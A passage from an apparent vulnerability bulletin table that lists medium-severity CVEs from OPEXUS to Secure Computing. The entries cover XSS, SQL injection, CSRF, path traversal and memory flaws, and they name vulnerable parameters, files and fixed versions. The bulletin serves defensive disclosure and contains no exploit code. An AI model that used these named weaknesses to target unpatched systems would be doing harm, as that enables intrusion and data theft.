| OPEXUS--eCASE Audit | OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment in the "Estimated Staff Hours" field. The JavaScript is executed whenever another user visits the Project Cost tab. Fixed in OPEXUS eCASE Audit 11.14.2.0. | 2026-01-08 | 5.5 | CVE-2026-22233 | |
| opf--openproject | OpenProject is an open-source, web-based project management software. OpenProject versions prior to version 16.6.3, allowed users with the View Meetings permission on any project, to access meeting details of meetings that belonged to projects, the user does not have access to. This issue has been patched in version 16.6.3. | 2026-01-10 | 4.3 | CVE-2026-22605 | https://github.com/opf/openproject/security/advisories/GHSA-fq4m-pxvm-8x2j https://github.com/opf/openproject/releases/tag/v16.6.3 |
| P5--FNIP-8x16A | P5 FNIP-8x16A FNIP-4xSH 1.0.20 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft malicious web pages to add new admin users, change passwords, and modify system configurations by tricking authenticated users into loading a specially crafted form. | 2026-01-06 | 4.3 | CVE-2020-36906 | ExploitDB-48362 Official Product Homepage Zero Science Lab Disclosure (ZSL-2020-5564) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange 1 IBM X-Force Vulnerability Exchange 2 VulnCheck Advisory: P5 FNIP-8x16A FNIP-4xSH 1.0.20 Cross-Site Request Forgery via User Management |
| pagup--Bulk Auto Image Alt Text (Alt tag, Alt attribute) optimizer (image SEO) | The BIALTY - Bulk Image Alt Text (Alt tag, Alt Attribute) with Yoast SEO + WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'bialty_cs_alt' post meta in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the post editor. | 2026-01-09 | 6.4 | CVE-2025-15019 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0af219a7-6596-47b2-ab8e-a71f20218759?source=cve https://plugins.trac.wordpress.org/changeset/3431985/bulk-image-alt-text-with-yoast/trunk/admin/views/metabox.view.php |
| pagup--WP Google Street View (with 360 virtual tour) & Google maps + Local SEO | The WP Google Street View (with 360° virtual tour) & Google maps + Local SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpgsv_map' shortcode in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2026-0563 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2bc8a3fb-176e-4bf0-b96e-6ccb9688254b?source=cve https://plugins.trac.wordpress.org/changeset/3432185/wp-google-street-view/trunk/includes/shortcode.php |
| Parsl--parsl | Parsl is a Python parallel scripting library. A SQL Injection vulnerability exists in the parsl-visualize component of versions prior to 2026.01.05. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against the monitoring database. Version 2026.01.05 fixes the issue. | 2026-01-08 | 5.3 | CVE-2026-21892 | https://github.com/Parsl/parsl/security/advisories/GHSA-f2mf-q878-gh58 https://github.com/Parsl/parsl/commit/013a928461e70f38a33258bd525a351ed828e974 |
| Passionate Brains--GA4WP: Google Analytics for WordPress | Missing Authorization vulnerability in Passionate Brains GA4WP: Google Analytics for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GA4WP: Google Analytics for WordPress: from n/a through 2.10.0. | 2026-01-08 | 5.4 | CVE-2026-22517 | https://patchstack.com/database/wordpress/plugin/ga-for-wp/vulnerability/wordpress-ga4wp-google-analytics-for-wordpress-plugin-2-10-0-broken-access-control-vulnerability?_s_id=cve |
| pencilwp--X Addons for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pencilwp X Addons for Elementor allows DOM-Based XSS. This issue affects X Addons for Elementor: from n/a through 1.0.23. | 2026-01-08 | 6.5 | CVE-2026-22518 | https://patchstack.com/database/wordpress/plugin/x-addons-elementor/vulnerability/wordpress-x-addons-for-elementor-plugin-1-0-23-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PHPGurukul--Online Course Registration System | A vulnerability was determined in PHPGurukul Online Course Registration System up to 3.1. This impacts an unknown function of the file /onlinecourse/admin/manage-students.php. Manipulation of the argument id/cid leads to SQL injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-01-08 | 6.3 | CVE-2026-0733 | VDB-340130 (PHPGurukul Online Course Registration System manage-students.php sql injection); VDB-340130 CTI Indicators (IOB, IOC, TTP, IOA); Submit #733328 (PHPGurukul Online Course Registration System ≤ 3.1 SQL Injection Vulnerability); Submit #733331 (duplicate of the same report); https://note-hxlab.wetolink.com/share/cU33RBoPPAF0 https://note-hxlab.wetolink.com/share/Tma34bofeB2L https://phpgurukul.com/ |
| PHPGurukul--Online Course Registration System | A vulnerability was found in PHPGurukul Online Course Registration System up to 3.1. This affects an unknown part of the file /enroll.php. The manipulation of the argument studentregno/Pincode/session/department/level/course/sem results in SQL injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2026-01-09 | 6.3 | CVE-2026-0803 | VDB-340255 (PHPGurukul Online Course Registration System enroll.php sql injection); VDB-340255 CTI Indicators (IOB, IOC, TTP, IOA); Submit #733344 (PHPGurukul Online Course Registration System ≤ 3.1 SQL Injection); https://note-hxlab.wetolink.com/share/qX132pk8Wofk https://phpgurukul.com/ |
| pichel--WP Js List Pages Shortcodes | The WP Js List Pages Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' shortcode attribute in all versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14110 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3f8dced7-cbe1-4d50-9fa0-1cf441dddefa?source=cve https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/tags/1.21/js-list-pages-shortcodes.php#L58 https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L47 https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L50 https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L58 |
| POSIMYTH Innovation--The Plus Addons for Elementor Pro | Missing Authorization vulnerability in POSIMYTH Innovation The Plus Addons for Elementor Pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Plus Addons for Elementor Pro: from n/a before 6.3.7. | 2026-01-07 | 6.5 | CVE-2025-46434 | https://patchstack.com/database/wordpress/plugin/theplus_elementor_addon/vulnerability/wordpress-the-plus-addons-for-elementor-pro-plugin-6-3-7-broken-access-control-vulnerability?_s_id=cve |
| POSIMYTH--The Plus Addons for Elementor Page Builder Lite | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in POSIMYTH The Plus Addons for Elementor Page Builder Lite allows DOM-Based XSS. This issue affects The Plus Addons for Elementor Page Builder Lite: from n/a through 5.3.3. | 2026-01-05 | 6.5 | CVE-2024-23511 | https://vdp.patchstack.com/database/wordpress/plugin/the-plus-addons-for-elementor-page-builder/vulnerability/wordpress-the-plus-addons-for-elementor-plugin-5-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| pr-gateway--Blog2Social: Social Media Auto Post & Scheduler | The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 8.7.2. This is due to a misconfigured authorization check on the 'getShipItemFullText' function which only verifies that a user has the 'read' capability (Subscriber-level) and a valid nonce, but fails to verify whether the user has permission to access the specific post being requested. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract data from password-protected, private, or draft posts. | 2026-01-10 | 4.3 | CVE-2025-14943 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7374db91-4e7d-4db2-9c58-bb9bdda5c85d?source=cve https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Get.php#L243 https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Get.php?rev=3423620#L252 |
| praveentamil--Sticky Action Buttons | The Sticky Action Buttons plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the sabs_options_page_form_submit() function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14465 | https://www.wordfence.com/threat-intel/vulnerabilities/id/82b243c7-5b58-4765-9083-4660c0b479cc?source=cve https://plugins.trac.wordpress.org/browser/sticky-action-buttons/tags/1.0/sticky-action-buttons.php#L105 |
| premmerce--Premmerce WooCommerce Customers Manager | The Premmerce WooCommerce Customers Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'money_spent_from', 'money_spent_to', 'registered_from', and 'registered_to' parameters in all versions up to, and including, 1.1.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrator into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-13369 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9980ec20-60ae-42eb-a2cd-146e57435398?source=cve https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/src/Admin/Admin.php#L135 https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/src/Admin/Admin.php#L135 https://plugins.trac.wordpress.org/browser/woo-customers-manager/trunk/views/admin/filter.php#L43 https://plugins.trac.wordpress.org/browser/woo-customers-manager/tags/1.1.14/views/admin/filter.php#L43 |
| Project-MONAI--MONAI | MONAI (Medical Open Network for AI) is an AI toolkit for health care imaging. In versions up to and including 1.5.1, a Path Traversal (Zip Slip) vulnerability exists in MONAI's `_download_from_ngc_private()` function. The function uses `zipfile.ZipFile.extractall()` without path validation, while other similar download functions in the same codebase properly use the existing `safe_extract_member()` function. Commit 4014c8475626f20f158921ae0cf98ed259ae4d59 fixes this issue. | 2026-01-07 | 5.3 | CVE-2026-21851 | https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-9rg3-9pvr-6p27 https://github.com/Project-MONAI/MONAI/commit/4014c8475626f20f158921ae0cf98ed259ae4d59 |
| pterodactyl--panel | Pterodactyl is a free, open-source game server management panel. Versions 1.11.11 and below allow TOTP to be used multiple times during its validity window. Users with 2FA enabled are prompted to enter a token during sign-in, and afterward it is not sufficiently marked as used in the system. This allows an attacker who intercepts that token to use it in addition to a known username/password during the 60-second token validity window. The attacker must have intercepted a valid 2FA token (for example, during a screen share). This issue is fixed in version 1.12.0. | 2026-01-06 | 6.5 | CVE-2025-69197 | https://github.com/pterodactyl/panel/security/advisories/GHSA-rgmp-4873-r683 https://github.com/pterodactyl/panel/commit/032bf076d92bb2f929fa69c1bac1b89f26b8badf https://github.com/pterodactyl/panel/releases/tag/v1.12.0 |
| publishpress--Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories | The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.9.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Contributor-level access and above, to create, update, delete, and publish malicious workflows that may automatically delete any post upon publication or update, including posts created by administrators. | 2026-01-09 | 5.4 | CVE-2025-14718 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8198d81a-40c0-49c1-8c38-f5ef6fb911ad?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/post-expirator/tags/4.9.3/src/Modules/Workflows/Rest/RestApiV1.php&new_path=/post-expirator/tags/4.9.4/src/Modules/Workflows/Rest/RestApiV1.php |
| pypa--virtualenv | virtualenv is a tool for creating isolated virtual python environments. Prior to version 20.36.1, TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities in virtualenv allow local attackers to perform symlink-based attacks on directory creation operations. An attacker with local access can exploit a race condition between directory existence checks and creation to redirect virtualenv's app_data and lock file operations to attacker-controlled locations. This issue has been patched in version 20.36.1. | 2026-01-10 | 4.5 | CVE-2026-22702 | https://github.com/pypa/virtualenv/security/advisories/GHSA-597g-3phw-6986 https://github.com/pypa/virtualenv/pull/3013 https://github.com/pypa/virtualenv/commit/dec4cec5d16edaf83a00a658f32d1e032661cebc |
| Qualcomm, Inc.--Snapdragon | Information disclosure while processing a firmware event. | 2026-01-06 | 6.1 | CVE-2025-47331 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing a config call from userspace. | 2026-01-06 | 6.7 | CVE-2025-47332 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while handling buffer mapping operations in the cryptographic driver. | 2026-01-06 | 6.6 | CVE-2025-47333 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing shared command buffer packet between camera userspace and kernel. | 2026-01-06 | 6.7 | CVE-2025-47334 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while parsing clock configuration data for a specific hardware type. | 2026-01-06 | 6.7 | CVE-2025-47335 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while performing sensor register read operations. | 2026-01-06 | 6.7 | CVE-2025-47336 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while accessing a synchronization object during concurrent operations. | 2026-01-06 | 6.7 | CVE-2025-47337 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while handling sensor utility operations. | 2026-01-06 | 6.7 | CVE-2025-47344 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Transient DOS while parsing a WLAN management frame with a Vendor Specific Information Element. | 2026-01-06 | 6.5 | CVE-2025-47395 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Transient DOS while parsing video packets received from the video firmware. | 2026-01-06 | 5.5 | CVE-2025-47330 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Information disclosure when a weak hashed value is returned to userland code in response to an IOCTL call to obtain a session ID. | 2026-01-06 | 5.5 | CVE-2025-47369 | https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2026-bulletin.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Missing Authorization vulnerability, allowing authenticated remote attackers to modify specific network packet parameters, enabling certain system functions to access other users' files. | 2026-01-05 | 6.5 | CVE-2025-15235 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2026-01-05 | 6.5 | CVE-2025-15238 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2026-01-05 | 6.5 | CVE-2025-15239 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Path Traversal vulnerability, allowing authenticated remote attackers to read folder names under the specified path by exploiting an Absolute Path Traversal vulnerability. | 2026-01-05 | 4.3 | CVE-2025-15236 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| Quanta Computer--QOCA aim AI Medical Cloud Platform | QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Path Traversal vulnerability, allowing authenticated remote attackers to read folder names under the specified path by exploiting an Absolute Path Traversal vulnerability. | 2026-01-05 | 4.3 | CVE-2025-15237 | https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html |
| quarkusio--quarkus | Quarkus is a Cloud Native, (Linux) Container First framework for writing Java applications. Prior to versions 3.31.0, 3.27.2, and 3.20.5, a vulnerability exists in the HTTP layer of Quarkus REST related to response handling. When a response is being written, the framework waits for previously written response chunks to be fully transmitted before proceeding. If the client connection is dropped during this waiting period, the associated worker thread is never released and becomes permanently blocked. Under sustained or repeated occurrences, this can exhaust the available worker threads, leading to degraded performance, or complete unavailability of the application. This issue has been patched in versions 3.31.0, 3.27.2, and 3.20.5. A workaround involves implementing a health check that monitors the status and saturation of the worker thread pool to detect abnormal thread retention early. | 2026-01-07 | 5.9 | CVE-2025-66560 | https://github.com/quarkusio/quarkus/security/advisories/GHSA-5rfx-cp42-p624 |
| quickjs-ng--quickjs | A vulnerability was identified in quickjs-ng quickjs up to 0.11.0. This issue affects the function js_typed_array_sort of the file quickjs.c. The manipulation leads to heap-based buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The identifier of the patch is 53eefbcd695165a3bd8c584813b472cb4a69fbf5. To fix this issue, it is recommended to deploy a patch. | 2026-01-10 | 6.3 | CVE-2026-0822 | VDB-340356 \| quickjs-ng quickjs quickjs.c js_typed_array_sort heap-based overflow VDB-340356 \| CTI Indicators (IOB, IOC, IOA) Submit #731783 \| quickjs-ng quickjs v0.11.0 Heap-based Buffer Overflow https://github.com/quickjs-ng/quickjs/issues/1297 https://github.com/quickjs-ng/quickjs/pull/1298 https://github.com/quickjs-ng/quickjs/issues/1297#issue-3780006202 https://github.com/quickjs-ng/quickjs/commit/53eefbcd695165a3bd8c584813b472cb4a69fbf5 |
| RainyGao--DocSys | A vulnerability was detected in RainyGao DocSys up to 2.02.36. The affected element is an unknown function of the file src/com/DocSystem/mapping/GroupMemberMapper.xml. Performing a manipulation of the argument searchWord results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 6.3 | CVE-2025-15492 | VDB-340270 \| RainyGao DocSys GroupMemberMapper.xml sql injection VDB-340270 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #725373 \| https://github.com/RainyGao-GitHub/DocSys/releases/tag/DocSys_V2 RainyGao-GitHub 2.02.36 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/SQL%E6%B3%A8%E5%85%A53.md https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/SQL%E6%B3%A8%E5%85%A53.md#vulnerability-analysis-and-reproduction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0 |
| RainyGao--DocSys | A flaw has been found in RainyGao DocSys up to 2.02.36. The impacted element is an unknown function of the file src/com/DocSystem/mapping/ReposAuthMapper.xml. Executing a manipulation of the argument searchWord can lead to sql injection. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 6.3 | CVE-2025-15493 | VDB-340271 \| RainyGao DocSys ReposAuthMapper.xml sql injection VDB-340271 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #725374 \| https://github.com/RainyGao-GitHub/DocSys/releases/tag/DocSys_V2 RainyGao-GitHub 2.02.36 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/sql%E6%B3%A8%E5%85%A52.md#vulnerability-analysis-and-reproduction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0 |
| RainyGao--DocSys | A vulnerability has been found in RainyGao DocSys up to 2.02.37. This affects an unknown function of the file com/DocSystem/mapping/UserMapper.xml. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 6.3 | CVE-2025-15494 | VDB-340272 \| RainyGao DocSys UserMapper.xml sql injection VDB-340272 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #725407 \| https://github.com/RainyGao-GitHub/DocSys/releases/tag/DocSys_V2 RainyGao-GitHub 2.02.37 SQL injection https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/SQL%E6%B3%A8%E5%85%A52.02.37.md https://github.com/xkalami-Tta0/CVE/blob/main/DocSys/SQL%E6%B3%A8%E5%85%A52.02.37.md#vulnerability-analysis-and-reproduction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. The Keycloak Authorization header parser is overly permissive regarding the formatting of the "Bearer" authentication scheme. It accepts non-standard characters (such as tabs) as separators and tolerates case variations that deviate from RFC 6750 specifications. | 2026-01-08 | 5.3 | CVE-2026-0707 | https://access.redhat.com/security/cve/CVE-2026-0707 RHBZ#2427768 |
| remix-run--react-router | React Router is a router for React. In versions 6.0.0 through 6.30.1 and 7.0.0 through 7.9.5, an attacker-supplied path can be crafted so that when a React Router application navigates to it via navigate(), <Link>, or redirect(), the app performs a navigation/redirect to an external URL. This is only an issue if you are passing untrusted content into navigation paths in your application code. This issue has been patched in versions 6.30.2 and 7.9.6. | 2026-01-10 | 6.5 | CVE-2025-68470 | https://github.com/remix-run/react-router/security/advisories/GHSA-9jcx-v3wj-wh4m |
| remix-run--react-router | React Router is a router for React. In @remix-run/server-runtime versions prior to 2.17.3 and react-router 7.0.0 through 7.11.0, React Router (or Remix v2) is vulnerable to CSRF attacks on document POST requests to UI routes when using server-side route action handlers in Framework Mode, or when using React Server Actions in the new unstable RSC modes. There is no impact if Declarative Mode (<BrowserRouter>) or Data Mode (createBrowserRouter/<RouterProvider>) is being used. This issue has been patched in @remix-run/server-runtime version 2.17.3 and react-router version 7.12.0. | 2026-01-10 | 6.5 | CVE-2026-22030 | https://github.com/remix-run/react-router/security/advisories/GHSA-h5cw-625j-3rxh |
| roxnor--EmailKit Email Customizer for WooCommerce & WP | The EmailKit plugin for WordPress is vulnerable to Arbitrary File Read via Path Traversal in all versions up to, and including, 1.6.1. This is due to missing path validation in the create_template REST API endpoint where user-controlled input from the emailkit-editor-template parameter is passed directly to file_get_contents() without sanitization. This makes it possible for authenticated attackers with Author-level permissions or higher to read arbitrary files on the server, including sensitive configuration files like /etc/passwd and wp-config.php, via the REST API. The file contents are stored in post meta and can be exfiltrated through MetForm's email confirmation feature. | 2026-01-07 | 6.5 | CVE-2025-14059 | https://www.wordfence.com/threat-intel/vulnerabilities/id/91ebe8cb-99ec-4380-a77e-17e17144a17e?source=cve https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L163 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3419280%40emailkit%2Ftrunk&old=3373383%40emailkit%2Ftrunk&sfp_email=&sfph_mail=#file1 |
| roxnor--Popup builder with Gamification, Multi-Step Popups, Page-Level Targeting, and WooCommerce Triggers | The Popupkit plugin for WordPress is vulnerable to arbitrary subscriber data deletion due to missing authorization on the DELETE `/subscribers` REST API endpoint in all versions up to, and including, 2.2.0. This is due to the `permission_callback` only validating wp_rest nonce without checking user capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary subscriber records. | 2026-01-06 | 5.3 | CVE-2025-14441 | https://www.wordfence.com/threat-intel/vulnerabilities/id/48f5a44d-d01f-4c41-98da-7c1f6c65c254?source=cve https://plugins.trac.wordpress.org/browser/popup-builder-block/trunk/includes/Routes/Subscribers.php#L77 https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.2.0/includes/Routes/Subscribers.php#L77 https://plugins.trac.wordpress.org/browser/popup-builder-block/tags/2.2.0/includes/Routes/Subscribers.php#L64 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3421671%40popup-builder-block&new=3421671%40popup-builder-block&sfp_email=&sfph_mail= |
| rubengc--GamiPress Gamification plugin to reward points, achievements, badges & ranks in WordPress | The GamiPress - Gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the gamipress_ajax_get_posts and gamipress_ajax_get_users functions in all versions up to, and including, 7.6.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enumerate users, including their email addresses and to retrieve titles of private posts. | 2026-01-06 | 4.3 | CVE-2025-13812 | https://www.wordfence.com/threat-intel/vulnerabilities/id/acfdd579-0be9-476b-90cd-07f417712691?source=cve https://plugins.trac.wordpress.org/changeset/3430697/ |
| ruhul080--My Album Gallery | The My Album Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style_css' shortcode attribute in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14453 | https://www.wordfence.com/threat-intel/vulnerabilities/id/64399c1c-ea82-483b-b320-3c6f2cb010b3?source=cve https://plugins.trac.wordpress.org/browser/my-album-gallery/trunk/controllers/public/class-mygallery-shortcode.php#L121 https://plugins.trac.wordpress.org/browser/my-album-gallery/tags/1.0.4/controllers/public/class-mygallery-shortcode.php#L121 |
| ruhul080--My Album Gallery | The My Album Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image titles in all versions up to, and including, 1.0.4. This is due to insufficient input sanitization and output escaping on the 'attachment->title' attribute. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14796 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1dd0bb5b-2eb5-46f0-8942-2885b1138b70?source=cve https://plugins.trac.wordpress.org/browser/my-album-gallery/tags/1.0.4/mygallery-single.php#L92 https://plugins.trac.wordpress.org/browser/my-album-gallery/tags/1.0.4/controllers/public/class-mygallery-shortcode.php#L143 |
| RustCrypto--signatures | RustCrypto: Signatures offers support for digital signatures, which provide authentication of data using public-key cryptography. Prior to version 0.1.0-rc.2, a timing side-channel was discovered in the Decompose algorithm which is used during ML-DSA signing to generate hints for the signature. This issue has been patched in version 0.1.0-rc.2. | 2026-01-10 | 6.4 | CVE-2026-22705 | https://github.com/RustCrypto/signatures/security/advisories/GHSA-hcp2-x6j4-29j7 https://github.com/RustCrypto/signatures/pull/1144 https://github.com/RustCrypto/signatures/commit/035d9eef98486ecd00a8bf418c7817eb14dd6558 |
| samikeijonen--EDD Download Info | The EDD Download Info plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'edd_download_info_link' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14121 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c0290595-d74d-404e-9d28-75abc9055031?source=cve https://plugins.trac.wordpress.org/browser/edd-download-info/trunk/includes/shortcodes.php#L43 https://plugins.trac.wordpress.org/browser/edd-download-info/tags/1.1/includes/shortcodes.php#L43 |
| Samsung Mobile--Samsung Mobile Devices | Out-of-bounds read in libimagecodec.quram.so prior to SMR Jan-2026 Release 1 allows a remote attacker to access out-of-bounds memory. | 2026-01-09 | 5.3 | CVE-2026-20973 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Secure Computing--SnapGear Management Console SG560 | SnapGear Management Console SG560 3.1.5 contains a file manipulation vulnerability that allows authenticated users to read, write, and delete files using the edit_config_files CGI script. Attackers can manipulate POST request parameters in /cgi-bin/cgix/edit_config_files to access and modify files outside the intended /etc/config/ directory. | 2026-01-06 | 6.5 | CVE-2020-36909 | ExploitDB-48556 Zero Science Lab Disclosure (ZSL-2020-5568) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: Secure Computing SnapGear Management Console SG560 3.1.5 Arbitrary File Read/Write |
| Secure Computing--SnapGear Management Console SG560 | SnapGear Management Console SG560 version 3.1.5 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without user consent. Attackers can craft a malicious web page that automatically submits a form to create a new super user account with full administrative privileges when a logged-in user visits the page. | 2026-01-06 | 5.3 | CVE-2020-36908 | ExploitDB-48554 Zero Science Lab Disclosure (ZSL-2020-5567) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: Secure Computing SnapGear Management Console SG560 3.1.5 Cross-Site Request Forgery via Admin Users |
